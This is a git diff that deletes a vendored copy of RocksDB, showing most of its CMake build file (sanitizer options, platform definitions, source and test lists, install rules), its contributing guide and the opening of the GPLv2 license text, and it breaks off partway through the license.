-
-option(FAIL_ON_WARNINGS "Treat compile warnings as errors" OFF)
-if(FAIL_ON_WARNINGS)
-  if(MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /WX")
-  else() # assume GCC
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Werror")
-  endif()
-endif()
-
-option(WITH_ASAN "build with ASAN" OFF)
-if(WITH_ASAN)
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address")
-  if(WITH_JEMALLOC)
-    message(FATAL "ASAN does not work well with JeMalloc")
-  endif()
-endif()
-
-option(WITH_TSAN "build with TSAN" OFF)
-if(WITH_TSAN)
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=thread -pie")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=thread -fPIC")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=thread -fPIC")
-  if(WITH_JEMALLOC)
-    message(FATAL "TSAN does not work well with JeMalloc")
-  endif()
-endif()
-
-option(WITH_UBSAN "build with UBSAN" OFF)
-if(WITH_UBSAN)
-  add_definitions(-DROCKSDB_UBSAN_RUN)
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=undefined")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=undefined")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=undefined")
-  if(WITH_JEMALLOC)
-    message(FATAL "UBSAN does not work well with JeMalloc")
-  endif()
-endif()
-
-# Used to run CI build and tests so we can run faster
-set(OPTIMIZE_DEBUG_DEFAULT 0)        # Debug build is unoptimized by default use -DOPTDBG=1 to optimize
-
-if(DEFINED OPTDBG)
-   set(OPTIMIZE_DEBUG ${OPTDBG})
-else()
-   set(OPTIMIZE_DEBUG ${OPTIMIZE_DEBUG_DEFAULT})
-endif()
-
-if(MSVC)
-  if((${OPTIMIZE_DEBUG} EQUAL 1))
-    message(STATUS "Debug optimization is enabled")
-    set(CMAKE_CXX_FLAGS_DEBUG "/Oxt /${RUNTIME_LIBRARY}d")
-  else()
-    set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /Od /RTC1 /Gm /${RUNTIME_LIBRARY}d")
-  endif()
-  set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /Oxt /Zp8 /Gm- /Gy /${RUNTIME_LIBRARY}")
-
-  set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} /DEBUG")
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} /DEBUG")
-endif()
-
-if(CMAKE_COMPILER_IS_GNUCXX)
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-builtin-memcmp")
-endif()
-
-option(ROCKSDB_LITE "Build RocksDBLite version" OFF)
-if(ROCKSDB_LITE)
-  add_definitions(-DROCKSDB_LITE)
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-exceptions")
-endif()
-
-if(CMAKE_SYSTEM_NAME MATCHES "Cygwin")
-  add_definitions(-fno-builtin-memcmp -DCYGWIN)
-elseif(CMAKE_SYSTEM_NAME MATCHES "Darwin")
-  add_definitions(-DOS_MACOSX)
-  if(CMAKE_SYSTEM_PROCESSOR MATCHES arm)
-    add_definitions(-DIOS_CROSS_COMPILE -DROCKSDB_LITE)
-    # no debug info for IOS, that will make our library big
-    add_definitions(-DNDEBUG)
-  endif()
-elseif(CMAKE_SYSTEM_NAME MATCHES "Linux")
-  add_definitions(-DOS_LINUX)
-elseif(CMAKE_SYSTEM_NAME MATCHES "SunOS")
-  add_definitions(-DOS_SOLARIS)
-elseif(CMAKE_SYSTEM_NAME MATCHES "FreeBSD")
-  add_definitions(-DOS_FREEBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "NetBSD")
-  add_definitions(-DOS_NETBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "OpenBSD")
-  add_definitions(-DOS_OPENBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "DragonFly")
-  add_definitions(-DOS_DRAGONFLYBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "Android")
-  add_definitions(-DOS_ANDROID)
-elseif(CMAKE_SYSTEM_NAME MATCHES "Windows")
-  add_definitions(-DWIN32 -DOS_WIN -D_MBCS -DWIN64 -DNOMINMAX)
-  if(MINGW)
-    add_definitions(-D_WIN32_WINNT=_WIN32_WINNT_VISTA)
-  endif()
-endif()
-
-if(NOT WIN32)
-  add_definitions(-DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX)
-endif()
-
-option(WITH_FALLOCATE "build with fallocate" ON)
-
-if(WITH_FALLOCATE)
-  set(CMAKE_REQUIRED_FLAGS ${CMAKE_C_FLAGS})
-  include(CheckCSourceCompiles)
-  CHECK_C_SOURCE_COMPILES("
-#include <fcntl.h>
-#include <linux/falloc.h>
-int main() {
- int fd = open(\"/dev/null\", 0);
- fallocate(fd, FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE, 0, 1024);
-}
-" HAVE_FALLOCATE)
-  if(HAVE_FALLOCATE)
-    add_definitions(-DROCKSDB_FALLOCATE_PRESENT)
-  endif()
-endif()
-
-include(CheckFunctionExists)
-CHECK_FUNCTION_EXISTS(malloc_usable_size HAVE_MALLOC_USABLE_SIZE)
-if(HAVE_MALLOC_USABLE_SIZE)
-  add_definitions(-DROCKSDB_MALLOC_USABLE_SIZE)
-endif()
-
-include_directories(${PROJECT_SOURCE_DIR})
-include_directories(${PROJECT_SOURCE_DIR}/include)
-find_package(Threads REQUIRED)
-
-
-# Main library source code
-
-set(SOURCES
-        cache/clock_cache.cc
-        cache/lru_cache.cc
-        cache/sharded_cache.cc
-        db/builder.cc
-        db/c.cc
-        db/column_family.cc
-        db/compacted_db_impl.cc
-        db/compaction.cc
-        db/compaction_iterator.cc
-        db/compaction_job.cc
-        db/compaction_picker.cc
-        db/compaction_picker_universal.cc
-        db/convenience.cc
-        db/db_filesnapshot.cc
-        db/db_impl.cc
-        db/db_impl_write.cc
-        db/db_impl_compaction_flush.cc
-        db/db_impl_files.cc
-        db/db_impl_open.cc
-        db/db_impl_debug.cc
-        db/db_impl_experimental.cc
-        db/db_impl_readonly.cc
-        db/db_info_dumper.cc
-        db/db_iter.cc
-        db/dbformat.cc
-        db/event_helpers.cc
-        db/experimental.cc
-        db/external_sst_file_ingestion_job.cc
-        db/file_indexer.cc
-        db/flush_job.cc
-        db/flush_scheduler.cc
-        db/forward_iterator.cc
-        db/internal_stats.cc
-        db/log_reader.cc
-        db/log_writer.cc
-        db/malloc_stats.cc
-        db/managed_iterator.cc
-        db/memtable.cc
-        db/memtable_list.cc
-        db/merge_helper.cc
-        db/merge_operator.cc
-        db/range_del_aggregator.cc
-        db/repair.cc
-        db/snapshot_impl.cc
-        db/table_cache.cc
-        db/table_properties_collector.cc
-        db/transaction_log_impl.cc
-        db/version_builder.cc
-        db/version_edit.cc
-        db/version_set.cc
-        db/wal_manager.cc
-        db/write_batch.cc
-        db/write_batch_base.cc
-        db/write_controller.cc
-        db/write_thread.cc
-        env/env.cc
-        env/env_chroot.cc
-        env/env_encryption.cc
-        env/env_hdfs.cc
-        env/mock_env.cc
-        memtable/alloc_tracker.cc
-        memtable/hash_cuckoo_rep.cc
-        memtable/hash_linklist_rep.cc
-        memtable/hash_skiplist_rep.cc
-        memtable/skiplistrep.cc
-        memtable/vectorrep.cc
-        memtable/write_buffer_manager.cc
-        monitoring/histogram.cc
-        monitoring/histogram_windowing.cc
-        monitoring/instrumented_mutex.cc
-        monitoring/iostats_context.cc
-        monitoring/perf_context.cc
-        monitoring/perf_level.cc
-        monitoring/statistics.cc
-        monitoring/thread_status_impl.cc
-        monitoring/thread_status_updater.cc
-        monitoring/thread_status_util.cc
-        monitoring/thread_status_util_debug.cc
-        options/cf_options.cc
-        options/db_options.cc
-        options/options.cc
-        options/options_helper.cc
-        options/options_parser.cc
-        options/options_sanity_check.cc
-        port/stack_trace.cc
-        table/adaptive_table_factory.cc
-        table/block.cc
-        table/block_based_filter_block.cc
-        table/block_based_table_builder.cc
-        table/block_based_table_factory.cc
-        table/block_based_table_reader.cc
-        table/block_builder.cc
-        table/block_prefix_index.cc
-        table/bloom_block.cc
-        table/cuckoo_table_builder.cc
-        table/cuckoo_table_factory.cc
-        table/cuckoo_table_reader.cc
-        table/flush_block_policy.cc
-        table/format.cc
-        table/full_filter_block.cc
-        table/get_context.cc
-        table/index_builder.cc
-        table/iterator.cc
-        table/merging_iterator.cc
-        table/meta_blocks.cc
-        table/partitioned_filter_block.cc
-        table/persistent_cache_helper.cc
-        table/plain_table_builder.cc
-        table/plain_table_factory.cc
-        table/plain_table_index.cc
-        table/plain_table_key_coding.cc
-        table/plain_table_reader.cc
-        table/sst_file_writer.cc
-        table/table_properties.cc
-        table/two_level_iterator.cc
-        tools/db_bench_tool.cc
-        tools/dump/db_dump_tool.cc
-        tools/ldb_cmd.cc
-        tools/ldb_tool.cc
-        tools/sst_dump_tool.cc
-        util/arena.cc
-        util/auto_roll_logger.cc
-        util/bloom.cc
-        util/coding.cc
-        util/compaction_job_stats_impl.cc
-        util/comparator.cc
-        util/concurrent_arena.cc
-        util/crc32c.cc
-        util/delete_scheduler.cc
-        util/dynamic_bloom.cc
-        util/event_logger.cc
-        util/file_reader_writer.cc
-        util/file_util.cc
-        util/filename.cc
-        util/filter_policy.cc
-        util/hash.cc
-        util/log_buffer.cc
-        util/murmurhash.cc
-        util/random.cc
-        util/rate_limiter.cc
-        util/slice.cc
-        util/sst_file_manager_impl.cc
-        util/status.cc
-        util/status_message.cc
-        util/string_util.cc
-        util/sync_point.cc
-        util/thread_local.cc
-        util/threadpool_imp.cc
-        util/xxhash.cc
-        utilities/backupable/backupable_db.cc
-        utilities/blob_db/blob_db.cc
-        utilities/blob_db/blob_db_impl.cc
-        utilities/blob_db/blob_dump_tool.cc
-        utilities/blob_db/blob_file.cc
-        utilities/blob_db/blob_log_reader.cc
-        utilities/blob_db/blob_log_writer.cc
-        utilities/blob_db/blob_log_format.cc
-        utilities/blob_db/ttl_extractor.cc
-        utilities/cassandra/cassandra_compaction_filter.cc
-        utilities/cassandra/format.cc
-        utilities/cassandra/merge_operator.cc
-        utilities/checkpoint/checkpoint_impl.cc
-        utilities/col_buf_decoder.cc
-        utilities/col_buf_encoder.cc
-        utilities/column_aware_encoding_util.cc
-        utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
-        utilities/date_tiered/date_tiered_db_impl.cc
-        utilities/debug.cc
-        utilities/document/document_db.cc
-        utilities/document/json_document.cc
-        utilities/document/json_document_builder.cc
-        utilities/env_mirror.cc
-        utilities/env_timed.cc
-        utilities/geodb/geodb_impl.cc
-        utilities/leveldb_options/leveldb_options.cc
-        utilities/lua/rocks_lua_compaction_filter.cc
-        utilities/memory/memory_util.cc
-        utilities/merge_operators/max.cc
-        utilities/merge_operators/put.cc
-        utilities/merge_operators/string_append/stringappend.cc
-        utilities/merge_operators/string_append/stringappend2.cc
-        utilities/merge_operators/uint64add.cc
-        utilities/option_change_migration/option_change_migration.cc
-        utilities/options/options_util.cc
-        utilities/persistent_cache/block_cache_tier.cc
-        utilities/persistent_cache/block_cache_tier_file.cc
-        utilities/persistent_cache/block_cache_tier_metadata.cc
-        utilities/persistent_cache/persistent_cache_tier.cc
-        utilities/persistent_cache/volatile_tier_impl.cc
-        utilities/redis/redis_lists.cc
-        utilities/simulator_cache/sim_cache.cc
-        utilities/spatialdb/spatial_db.cc
-        utilities/table_properties_collectors/compact_on_deletion_collector.cc
-        utilities/transactions/optimistic_transaction_db_impl.cc
-        utilities/transactions/optimistic_transaction.cc
-        utilities/transactions/transaction_base.cc
-        utilities/transactions/pessimistic_transaction_db.cc
-        utilities/transactions/transaction_db_mutex_impl.cc
-        utilities/transactions/pessimistic_transaction.cc
-        utilities/transactions/transaction_lock_mgr.cc
-        utilities/transactions/transaction_util.cc
-        utilities/transactions/write_prepared_txn.cc
-        utilities/ttl/db_ttl_impl.cc
-        utilities/write_batch_with_index/write_batch_with_index.cc
-        utilities/write_batch_with_index/write_batch_with_index_internal.cc
-        $<TARGET_OBJECTS:build_version>)
-
-if(WIN32)
-  list(APPEND SOURCES
-    port/win/io_win.cc
-    port/win/env_win.cc
-    port/win/env_default.cc
-    port/win/port_win.cc
-    port/win/win_logger.cc
-    port/win/win_thread.cc
-    port/win/xpress_win.cc)
-	
-if(WITH_JEMALLOC)
-  list(APPEND SOURCES
-    port/win/win_jemalloc.cc)
-endif()
-	
-else()
-  list(APPEND SOURCES
-    port/port_posix.cc
-    env/env_posix.cc
-    env/io_posix.cc)
-endif()
-
-set(ROCKSDB_STATIC_LIB rocksdb${ARTIFACT_SUFFIX})
-# commented out to avoid building the shared lib
-#set(ROCKSDB_SHARED_LIB rocksdb-shared${ARTIFACT_SUFFIX})
-set(ROCKSDB_IMPORT_LIB ${ROCKSDB_SHARED_LIB})
-if(WIN32)
-  #set(SYSTEM_LIBS ${SYSTEM_LIBS} shlwapi.lib Rpcrt4.lib)
-  set(SYSTEM_LIBS ${SYSTEM_LIBS}  Rpcrt4.lib)
-  set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-else()
-  set(SYSTEM_LIBS ${CMAKE_THREAD_LIBS_INIT})
-  set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-# commented out to avoid building the shared lib
-# as there is no reason
-#add_library(${ROCKSDB_SHARED_LIB} SHARED ${SOURCES})
-
-# target_link_libraries(${ROCKSDB_SHARED_LIB}
-#    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-#  set_target_properties(${ROCKSDB_SHARED_LIB} PROPERTIES
-#                        LINKER_LANGUAGE CXX
-#                        VERSION ${ROCKSDB_VERSION}
-#                        SOVERSION ${ROCKSDB_VERSION_MAJOR}
-#                        CXX_STANDARD 11
-#                        OUTPUT_NAME "rocksdb")
-endif()
-
-option(WITH_LIBRADOS "Build with librados" OFF)
-if(WITH_LIBRADOS)
-  list(APPEND SOURCES
-    utilities/env_librados.cc)
-  list(APPEND THIRDPARTY_LIBS rados)
-endif()
-
-add_library(${ROCKSDB_STATIC_LIB} STATIC ${SOURCES})
-target_link_libraries(${ROCKSDB_STATIC_LIB}
-  ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-
-if(WIN32)
-#  add_library(${ROCKSDB_IMPORT_LIB} SHARED ${SOURCES})
-  #target_link_libraries(${ROCKSDB_IMPORT_LIB}  ${SYSTEM_LIBS})
-  #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
-   # COMPILE_DEFINITIONS "ROCKSDB_DLL;ROCKSDB_LIBRARY_EXPORTS")
-  if(MSVC)
-    set_target_properties(${ROCKSDB_STATIC_LIB} PROPERTIES
-      COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_STATIC_LIB}.pdb")
-    #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
-      #COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_IMPORT_LIB}.pdb")
-  endif()
-endif()
-
-option(WITH_JNI "build with JNI" OFF)
-if(WITH_JNI OR JNI)
-  message(STATUS "JNI library is enabled")
-  add_subdirectory(${CMAKE_CURRENT_SOURCE_DIR}/java)
-else()
-  message(STATUS "JNI library is disabled")
-endif()
-
-# Installation and packaging
-if(WIN32)
-  option(ROCKSDB_INSTALL_ON_WINDOWS "Enable install target on Windows" OFF)
-endif()
-if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
-  if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
-    if(${CMAKE_SYSTEM_NAME} STREQUAL "Linux")
-      # Change default installation prefix on Linux to /usr
-      set(CMAKE_INSTALL_PREFIX /usr CACHE PATH "Install path prefix, prepended onto install directories." FORCE)
-    endif()
-  endif()
-
-  include(GNUInstallDirs)
-  include(CMakePackageConfigHelpers)
-
-  set(package_config_destination ${CMAKE_INSTALL_LIBDIR}/cmake/rocksdb)
-
-  configure_package_config_file(
-    ${CMAKE_SOURCE_DIR}/cmake/RocksDBConfig.cmake.in RocksDBConfig.cmake
-    INSTALL_DESTINATION ${package_config_destination}
-  )
-
-  write_basic_package_version_file(
-    RocksDBConfigVersion.cmake
-    VERSION ${ROCKSDB_VERSION}
-    COMPATIBILITY SameMajorVersion
-  )
-
-  install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}")
-
-  install(
-    TARGETS ${ROCKSDB_STATIC_LIB}
-    EXPORT RocksDBTargets
-    COMPONENT devel
-    ARCHIVE DESTINATION "${CMAKE_INSTALL_LIBDIR}"
-    INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}"
-  )
-
-  install(
-    TARGETS ${ROCKSDB_SHARED_LIB}
-    EXPORT RocksDBTargets
-    COMPONENT runtime
-    RUNTIME DESTINATION "${CMAKE_INSTALL_BINDIR}"
-    LIBRARY DESTINATION "${CMAKE_INSTALL_LIBDIR}"
-    INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}"
-  )
-
-  install(
-    EXPORT RocksDBTargets
-    COMPONENT devel
-    DESTINATION ${package_config_destination}
-    NAMESPACE RocksDB::
-  )
-
-  install(
-    FILES
-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
-    COMPONENT devel
-    DESTINATION ${package_config_destination}
-  )
-endif()
-
-option(WITH_TESTS "build with tests" ON)
-if(WITH_TESTS)
-  set(TESTS
-        cache/cache_test.cc
-        cache/lru_cache_test.cc
-        db/column_family_test.cc
-        db/compact_files_test.cc
-        db/compaction_iterator_test.cc
-        db/compaction_job_stats_test.cc
-        db/compaction_job_test.cc
-        db/compaction_picker_test.cc
-        db/comparator_db_test.cc
-        db/corruption_test.cc
-        db/cuckoo_table_db_test.cc
-        db/db_basic_test.cc
-        db/db_blob_index_test.cc
-        db/db_block_cache_test.cc
-        db/db_bloom_filter_test.cc
-        db/db_compaction_filter_test.cc
-        db/db_compaction_test.cc
-        db/db_dynamic_level_test.cc
-        db/db_flush_test.cc
-        db/db_inplace_update_test.cc
-        db/db_io_failure_test.cc
-        db/db_iter_test.cc
-        db/db_iterator_test.cc
-        db/db_log_iter_test.cc
-        db/db_memtable_test.cc
-        db/db_merge_operator_test.cc
-        db/db_options_test.cc
-        db/db_properties_test.cc
-        db/db_range_del_test.cc
-        db/db_sst_test.cc
-        db/db_statistics_test.cc
-        db/db_table_properties_test.cc
-        db/db_tailing_iter_test.cc
-        db/db_test.cc
-        db/db_test2.cc
-        db/db_universal_compaction_test.cc
-        db/db_wal_test.cc
-        db/db_write_test.cc
-        db/dbformat_test.cc
-        db/deletefile_test.cc
-        db/external_sst_file_basic_test.cc
-        db/external_sst_file_test.cc
-        db/fault_injection_test.cc
-        db/file_indexer_test.cc
-        db/filename_test.cc
-        db/flush_job_test.cc
-        db/listener_test.cc
-        db/log_test.cc
-        db/manual_compaction_test.cc
-        db/memtable_list_test.cc
-        db/merge_helper_test.cc
-        db/merge_test.cc
-        db/options_file_test.cc
-        db/perf_context_test.cc
-        db/plain_table_db_test.cc
-        db/prefix_test.cc
-        db/repair_test.cc
-        db/table_properties_collector_test.cc
-        db/version_builder_test.cc
-        db/version_edit_test.cc
-        db/version_set_test.cc
-        db/wal_manager_test.cc
-        db/write_batch_test.cc
-        db/write_callback_test.cc
-        db/write_controller_test.cc
-        env/env_basic_test.cc
-        env/env_test.cc
-        env/mock_env_test.cc
-        memtable/inlineskiplist_test.cc
-        memtable/skiplist_test.cc
-        memtable/write_buffer_manager_test.cc
-        monitoring/histogram_test.cc
-        monitoring/iostats_context_test.cc
-        monitoring/statistics_test.cc
-        options/options_settable_test.cc
-        options/options_test.cc
-        table/block_based_filter_block_test.cc
-        table/block_test.cc
-        table/cleanable_test.cc
-        table/cuckoo_table_builder_test.cc
-        table/cuckoo_table_reader_test.cc
-        table/full_filter_block_test.cc
-        table/merger_test.cc
-        table/table_test.cc
-        tools/ldb_cmd_test.cc
-        tools/reduce_levels_test.cc
-        tools/sst_dump_test.cc
-        util/arena_test.cc
-        util/auto_roll_logger_test.cc
-        util/autovector_test.cc
-        util/bloom_test.cc
-        util/coding_test.cc
-        util/crc32c_test.cc
-        util/delete_scheduler_test.cc
-        util/dynamic_bloom_test.cc
-        util/event_logger_test.cc
-        util/file_reader_writer_test.cc
-        util/filelock_test.cc
-        util/hash_test.cc
-        util/rate_limiter_test.cc
-        util/slice_transform_test.cc
-        util/timer_queue_test.cc
-        util/thread_list_test.cc
-        util/thread_local_test.cc
-        utilities/backupable/backupable_db_test.cc
-        utilities/blob_db/blob_db_test.cc
-        utilities/cassandra/cassandra_functional_test.cc
-        utilities/cassandra/cassandra_format_test.cc
-        utilities/cassandra/cassandra_row_merge_test.cc
-        utilities/cassandra/cassandra_serialize_test.cc
-        utilities/checkpoint/checkpoint_test.cc
-        utilities/column_aware_encoding_test.cc
-        utilities/date_tiered/date_tiered_test.cc
-        utilities/document/document_db_test.cc
-        utilities/document/json_document_test.cc
-        utilities/geodb/geodb_test.cc
-        utilities/lua/rocks_lua_test.cc
-        utilities/memory/memory_test.cc
-        utilities/merge_operators/string_append/stringappend_test.cc
-        utilities/object_registry_test.cc
-        utilities/option_change_migration/option_change_migration_test.cc
-        utilities/options/options_util_test.cc
-        utilities/persistent_cache/hash_table_test.cc
-        utilities/persistent_cache/persistent_cache_test.cc
-        utilities/redis/redis_lists_test.cc
-        utilities/spatialdb/spatial_db_test.cc
-        utilities/simulator_cache/sim_cache_test.cc
-        utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
-        utilities/transactions/optimistic_transaction_test.cc
-        utilities/transactions/transaction_test.cc
-        utilities/ttl/ttl_test.cc
-        utilities/write_batch_with_index/write_batch_with_index_test.cc
-  )
-  if(WITH_LIBRADOS)
-    list(APPEND TESTS utilities/env_librados_test.cc)
-  endif()
-
- 
-  # For test util library that is build only in DEBUG mode
-  # and linked to tests. Add test only code that is not #ifdefed for Release here.
-  set(TESTUTIL_SOURCE
-      db/db_test_util.cc
-      monitoring/thread_status_updater_debug.cc
-      table/mock_table.cc
-      util/fault_injection_test_env.cc
-      utilities/cassandra/test_utils.cc
-  )
-  # test utilities are only build in debug
-  enable_testing()
-  add_custom_target(check COMMAND ${CMAKE_CTEST_COMMAND})
-  set(TESTUTILLIB testutillib${ARTIFACT_SUFFIX})
-  add_library(${TESTUTILLIB} STATIC ${TESTUTIL_SOURCE})
-  if(MSVC)
-    set_target_properties(${TESTUTILLIB} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/testutillib${ARTIFACT_SUFFIX}.pdb")
-  endif()
-  set_target_properties(${TESTUTILLIB}
-        PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-        )
-
-  # Tests are excluded from Release builds
-  #set(TEST_EXES ${TESTS})
-
-  # while tests are not built, we want to ensure that any reference to gtest is removed in case the user
-  # builds rocksdb manually from our third party directory
-  #foreach(sourcefile ${TEST_EXES})
-  #    get_filename_component(exename ${sourcefile} NAME_WE)
-  #    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
-  #      $<TARGET_OBJECTS:testharness>)
-  #    set_target_properties(${exename}${ARTIFACT_SUFFIX}
-  #      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-  #      EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-  #      EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-  #      )
-  #    target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
-  #    if(NOT "${exename}" MATCHES "db_sanity_test")
-  #      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
-  #      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
-  #    endif()
-  #endforeach(sourcefile ${TEST_EXES})
-
-  # C executables must link to a shared object
-  set(C_TESTS db/c_test.c)
-  set(C_TEST_EXES ${C_TESTS})
-
-  foreach(sourcefile ${C_TEST_EXES})
-      string(REPLACE ".c" "" exename ${sourcefile})
-      string(REGEX REPLACE "^((.+)/)+" "" exename ${exename})
-      add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile})
-      set_target_properties(${exename}${ARTIFACT_SUFFIX}
-        PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-        )
-      target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${ROCKSDB_IMPORT_LIB} testutillib${ARTIFACT_SUFFIX})
-      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
-      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
-  endforeach(sourcefile ${C_TEST_EXES})
-endif()
diff --git a/thirdparty/rocksdb/CONTRIBUTING.md b/thirdparty/rocksdb/CONTRIBUTING.md
deleted file mode 100644
index b8b1a41..0000000
--- a/thirdparty/rocksdb/CONTRIBUTING.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# Contributing to RocksDB
-
-## Contributor License Agreement ("CLA")
-
-In order to accept your pull request, we need you to submit a CLA. You
-only need to do this once, so if you've done this for another Facebook
-open source project, you're good to go. If you are submitting a pull
-request for the first time, just let us know that you have completed
-the CLA and we can cross-check with your GitHub username.
-
-Complete your CLA here: <https://code.facebook.com/cla>
-
-If you prefer to sign a paper copy, we can send you a PDF.  Send us an 
-e-mail or create a new github issue to request the CLA in PDF format.
diff --git a/thirdparty/rocksdb/COPYING b/thirdparty/rocksdb/COPYING
deleted file mode 100644
index d159169..0000000
--- a/thirdparty/rocksdb/COPYING
+++ /dev/null
@@ -1,339 +0,0 @@
-                    GNU GENERAL PUBLIC LICENSE
-                       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-                            Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Lesser General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-                    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
